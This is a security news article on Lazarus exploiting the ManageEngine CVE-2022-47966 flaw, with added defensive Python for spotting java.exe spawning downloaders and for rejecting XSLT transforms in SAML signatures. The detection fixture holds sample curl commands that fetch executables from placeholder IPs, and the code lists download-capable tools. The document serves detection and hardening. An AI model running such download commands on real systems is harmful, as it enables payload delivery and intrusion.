Hackers use public ManageEngine exploit to breach internet org (Security News, August 2023)
The North Korean state-backed hacker group tracked as Lazarus has been exploiting a critical vulnerability in Zoho's ManageEngine ServiceDesk Plus to compromise an internet backbone infrastructure provider and healthcare organizations.
Cisco Talos researchers observed attacks against UK internet firms in early 2023, when Lazarus leveraged a publicly available exploit for CVE-2022-47966, a pre-authentication remote code execution flaw affecting multiple Zoho ManageEngine products. The flaw is reachable on instances where SAML-based single sign-on has been enabled at some point, which is why patching alone is not a substitute for checking whether an exposed instance was already compromised.
"In early 2023, we observed Lazarus Group successfully compromise an internet backbone infrastructure provider in the United Kingdom to successfully deploy QuiteRAT. The actors exploited a vulnerable ManageEngine ServiceDesk instance to gain initial access," said Cisco Talos.
After exploiting the vulnerability to breach a target, Lazarus hackers dropped the QuiteRAT malware from an external URL using a curl command.
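The post-exploitation step described above (a web application's Java process spawning curl to fetch a payload) is one of the most reliable things to hunt for after this kind of intrusion, because a ManageEngine server has no business launching command-line downloaders. The following is an added detection example, not code from the Talos report or from ManageEngine: it runs a simple rule over constructed, flattened process-creation events (the field names and all hosts, PIDs, paths and URLs are made up; the IP addresses are from the reserved documentation ranges) and flags any curl, cmd, PowerShell, certutil or bitsadmin child of a ManageEngine java.exe whose command line carries a URL. It goes slightly beyond the article's curl case by covering the other common download-capable binaries.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed sample events (NOT telemetry from the Talos report). Each line is a
# flattened key=value record of the kind an EDR or Sysmon Event ID 1 export yields.
SAMPLE_EVENTS = [
    # ServiceDesk Plus java.exe -> cmd.exe running curl to fetch a binary: should fire
    'ts=2023-02-01T10:14:03Z host=sdp01 ppid=4120 '
    'pimage="C:\\ManageEngine\\ServiceDesk\\jre\\bin\\java.exe" pid=5568 '
    'image="C:\\Windows\\System32\\cmd.exe" '
    'cmdline="cmd.exe /c curl.exe -o C:\\Users\\Public\\svc.exe http://198.51.100.23/svc.exe"',
    # Same parent starting a legitimate helper from its own install tree: benign
    'ts=2023-02-01T10:14:09Z host=sdp01 ppid=4120 '
    'pimage="C:\\ManageEngine\\ServiceDesk\\jre\\bin\\java.exe" pid=5602 '
    'image="C:\\ManageEngine\\ServiceDesk\\bin\\wrapper.exe" cmdline="wrapper.exe -s conf\\wrapper.conf"',
    # An administrator running curl from Explorer: not a ManageEngine parent, ignore
    'ts=2023-02-01T10:20:41Z host=sdp01 ppid=3001 '
    'pimage="C:\\Windows\\explorer.exe" pid=6010 '
    'image="C:\\Windows\\System32\\curl.exe" cmdline="curl.exe https://example.org/"',
    # ServiceDesk Plus java.exe -> curl.exe directly: should fire
    'ts=2023-02-01T10:22:17Z host=sdp01 ppid=4120 '
    'pimage="C:\\ManageEngine\\ServiceDesk\\jre\\bin\\java.exe" pid=6044 '
    'image="C:\\Windows\\System32\\curl.exe" '
    'cmdline="curl.exe -s -o C:\\Windows\\Temp\\q.bin http://203.0.113.5/q.bin"',
]

# key=value pairs; values are either double-quoted (may contain spaces) or bare tokens
FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
URL_RE = re.compile(r'https?://[^\s"]+')
# Download-capable child images a ManageEngine server process should never spawn
DOWNLOADERS = {"cmd.exe", "powershell.exe", "curl.exe", "certutil.exe", "bitsadmin.exe"}


def parse_event(line: str) -> Dict[str, str]:
    """Turn one flattened record into a dict of its fields."""
    return {
        m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
        for m in FIELD_RE.finditer(line)
    }


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_manageengine_java(parent_image: str) -> bool:
    """True when the parent is the JVM bundled under a ManageEngine install directory."""
    return "manageengine" in parent_image.lower() and basename(parent_image) == "java.exe"


@dataclass
class Finding:
    host: str
    pid: str
    child: str
    url: str


def find_suspicious(lines: List[str]) -> List[Finding]:
    """Rule: ManageEngine java.exe -> downloader child whose command line names a URL."""
    findings: List[Finding] = []
    for line in lines:
        ev = parse_event(line)
        if not is_manageengine_java(ev.get("pimage", "")):
            continue
        child = basename(ev.get("image", ""))
        if child not in DOWNLOADERS:
            continue
        m = URL_RE.search(ev.get("cmdline", ""))
        if not m:
            continue
        findings.append(Finding(ev.get("host", "?"), ev.get("pid", "?"), child, m.group(0)))
    return findings


if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_EVENTS):
        print(f"{f.host}: pid {f.pid} {f.child} fetched {f.url}")
```

Keying the rule on the parent image path rather than on the process name alone is deliberate: java.exe is common, but a JVM living under a ManageEngine install tree that spawns cmd.exe or curl.exe with a URL is specific enough to page on. The extracted URL is the first thing to pivot on when scoping the incident.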
In a separate report today, Cisco Talos said that Lazarus hackers have a new malware called CollectionRAT. The new threat was found after researchers examined infrastructure the actor used in other attacks.
Lazarus hackers linked to $60 million Alphapo cryptocurrency heist.
Related news
- Hackers exploit Ray framework flaw to breach servers, hijack resources (source)
- ArcaneDoor hackers exploit Cisco zero-days to breach govt networks (source)
- Hackers Exploit ConnectWise ScreenConnect Flaws to Deploy TODDLERSHARK Malware (source)
- Hackers Exploit Misconfigured YARN, Docker, Confluence, Redis Servers for Crypto Mining (source)
- Hackers exploit WordPress plugin flaw to infect 3,300 sites with malware (source)
- Magnet Goblin Hacker Group Leveraging 1-Day Exploits to Deploy Nerbian RAT (source)
- Hackers exploit Windows SmartScreen flaw to drop DarkGate malware (source)
- Hackers exploit Aiohttp bug to find vulnerable networks (source)
- Chinese Earth Krahang hackers breach 70 orgs in 23 countries (source)
- Russia Hackers Using TinyTurla-NG to Breach European NGO's Systems (source)
Related Vulnerability
Date | CVE | Vulnerability | CVSS score
---|---|---|---
2023-01-18 | CVE-2022-47966 | Pre-authentication remote code execution in multiple Zoho ManageEngine on-premise products (for example ServiceDesk Plus through build 14003) caused by their use of Apache Santuario xmlsec (XML Security for Java) 1.4.1. The xmlsec XSLT features, by design in that version, make the application responsible for certain security protections, and the ManageEngine applications did not provide those protections. | 9.8 (Critical)
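The protection the advisory says the applications failed to provide is, concretely, refusing to process an XML Signature whose Reference carries an XSLT Transform before the signature library ever executes it. The block below is an added example (mine, not Zoho's or Santuario's code) of that check done in Python on a SAML Response: it walks every ds:Transform, compares the Algorithm URI against an allowlist of the transforms a SAML relying party actually needs, and rejects anything else, XSLT included. The two SAML documents are constructed inline; the XSLT payload in the malicious one is inert (an empty template) because the point is the algorithm URI, not the stylesheet body. Real code should parse with a hardened parser such as defusedxml rather than the stdlib module used here for portability.

```python
import xml.etree.ElementTree as ET  # use defusedxml in production to block entity attacks
from typing import List

DS_NS = "http://www.w3.org/2000/09/xmldsig#"
NS = {"ds": DS_NS}

ENVELOPED = "http://www.w3.org/2000/09/xmldsig#enveloped-signature"
EXC_C14N = "http://www.w3.org/2001/10/xml-exc-c14n#"
XSLT_TRANSFORM = "http://www.w3.org/TR/1999/REC-xslt-19991116"

# The only transforms a SAML relying party needs; everything else (XSLT, XPath, ...) is rejected.
ALLOWED_TRANSFORMS = {
    ENVELOPED,
    EXC_C14N,
    EXC_C14N + "WithComments",
    "http://www.w3.org/TR/2001/REC-xml-c14n-20010315",
    "http://www.w3.org/TR/2001/REC-xml-c14n-20010315#WithComments",
}


class UnsafeTransform(ValueError):
    """Raised when a signature reference uses a transform outside the allowlist."""


def disallowed_transforms(saml_xml: str) -> List[str]:
    """Return the Algorithm URIs of every ds:Transform not on the allowlist, in document order."""
    root = ET.fromstring(saml_xml)
    return [
        t.get("Algorithm", "")
        for t in root.iterfind(".//ds:Transform", NS)
        if t.get("Algorithm", "") not in ALLOWED_TRANSFORMS
    ]


def assert_safe_transforms(saml_xml: str) -> None:
    """Gate to run BEFORE handing the document to the XML Signature library."""
    bad = disallowed_transforms(saml_xml)
    if bad:
        raise UnsafeTransform(f"rejecting SAML response, disallowed transform(s): {bad}")


def _transform_xml(alg: str) -> str:
    """Constructed ds:Transform element; the XSLT variant carries an inert stylesheet."""
    if alg == XSLT_TRANSFORM:
        return (
            f'<ds:Transform Algorithm="{alg}">'
            '<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">'
            '<xsl:template match="/"/></xsl:stylesheet></ds:Transform>'
        )
    return f'<ds:Transform Algorithm="{alg}"/>'


def build_response(transforms: List[str]) -> str:
    """Constructed minimal SAML Response with an enveloped signature using the given transforms."""
    return (
        '<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" '
        f'xmlns:ds="{DS_NS}" ID="_r1">'
        "<ds:Signature><ds:SignedInfo>"
        f'<ds:CanonicalizationMethod Algorithm="{EXC_C14N}"/>'
        '<ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"/>'
        '<ds:Reference URI="#_r1"><ds:Transforms>'
        + "".join(_transform_xml(a) for a in transforms)
        + "</ds:Transforms>"
        '<ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/>'
        "<ds:DigestValue>AAAA</ds:DigestValue></ds:Reference></ds:SignedInfo>"
        "<ds:SignatureValue>AAAA</ds:SignatureValue></ds:Signature></samlp:Response>"
    )


# Constructed inputs: a normal response and one smuggling an XSLT transform.
SAFE_RESPONSE = build_response([ENVELOPED, EXC_C14N])
XSLT_RESPONSE = build_response([ENVELOPED, XSLT_TRANSFORM])

if __name__ == "__main__":
    print("safe:", disallowed_transforms(SAFE_RESPONSE))
    print("xslt:", disallowed_transforms(XSLT_RESPONSE))
```

The order matters: reference processing (where transforms execute) happens during core validation, so an invalid SignatureValue does not save you; the allowlist check has to run on the raw document before the library sees it. Newer Santuario releases also ship a secure-validation mode that refuses XSLT transforms, which is the right fix at the library level, but an application-side gate like this one is what an application stuck on 1.4.x would have needed.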